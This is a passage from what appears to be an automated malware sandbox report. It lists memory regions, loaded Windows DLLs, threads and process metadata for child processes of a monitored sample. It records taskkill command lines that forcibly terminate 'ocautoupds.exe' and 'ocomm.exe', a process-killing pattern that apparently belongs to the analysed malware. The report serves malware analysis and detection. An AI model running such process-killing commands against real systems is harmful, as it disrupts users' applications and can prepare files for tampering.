0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1774 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1775 start_va = 0xf0000 end_va = 0xf3fff entry_point = 0xf0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 1776 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1777 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1778 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1779 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1780 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1781 start_va = 0x4a0000 end_va = 0x627fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 1782 start_va = 0x630000 end_va = 0x7b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 1783 start_va = 0x7c0000 end_va = 0x1bbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 1784 start_va = 0x1bc0000 end_va = 0x1c7ffff entry_point = 0x1bc0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1785 start_va = 0x1ce0000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 1786 start_va = 0x1ea0000 end_va = 0x1f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 1787 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1788 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1789 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1790 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1791 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1792 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1793 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1794 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1795 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1796 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1797 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1798 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1799 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1800 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1801 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1802 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1803 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1804 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1805 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1806 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1807 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1808 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1809 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1810 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1811 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1812 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1813 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1814 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1815 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1816 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1817 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 137 os_tid = 0x538 Thread: id = 161 os_tid = 0x7e4 Thread: id = 172 os_tid = 0x578 Thread: id = 175 os_tid = 0x8f4 Thread: id = 176 os_tid = 0x908 Process: id = "20" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x183e000" os_pid = "0x820" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM ocautoupds.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1510 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1511 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1512 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1513 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1514 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1515 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1516 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1517 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 1518 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1519 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1520 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 1521 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1522 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1523 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1524 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1926 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1927 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1928 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1929 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1930 start_va = 0x150000 end_va = 0x151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1931 start_va = 0x160000 end_va = 0x163fff entry_point = 0x160000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 1932 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1933 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1934 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1935 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1936 start_va = 0x2c0000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 1937 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1938 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1939 start_va = 0x470000 end_va = 0x5f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1940 start_va = 0x600000 end_va = 0x780fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 1941 start_va = 0x790000 end_va = 0x1b8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 1942 start_va = 0x1b90000 end_va = 0x1c4ffff entry_point = 0x1b90000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1943 start_va = 0x1c90000 end_va = 0x1d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 1944 start_va = 0x1d20000 end_va = 0x1d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 1945 start_va = 0x1da0000 end_va = 0x206efff entry_point = 0x1da0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1946 start_va = 0x20f0000 end_va = 0x216ffff entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 1947 start_va = 0x2240000 end_va = 0x22bffff entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 1948 start_va = 0x2350000 end_va = 0x23cffff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 1949 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1950 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1951 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1952 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1953 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1954 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1955 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1956 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1957 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1958 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1959 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1960 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1961 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1962 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1963 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1964 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1965 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1966 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1967 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1968 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1969 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1970 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1971 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1972 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1973 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1974 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1975 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1976 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1977 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1978 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1979 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1980 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1981 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1982 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1983 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1984 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1985 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1986 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1987 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1988 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 142 os_tid = 0x828 Thread: id = 181 os_tid = 0x8dc Thread: id = 185 os_tid = 0x330 Thread: id = 187 os_tid = 0x95c Thread: id = 188 os_tid = 0x960 Process: id = "21" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x1b5e000" os_pid = "0x6c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM ocomm.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1525 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1526 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1527 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 1528 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1529 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1530 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1531 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1532 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 1533 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1534 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1535 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 1536 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 1537 start_va = 0xe0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1538 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1539 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1989 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name 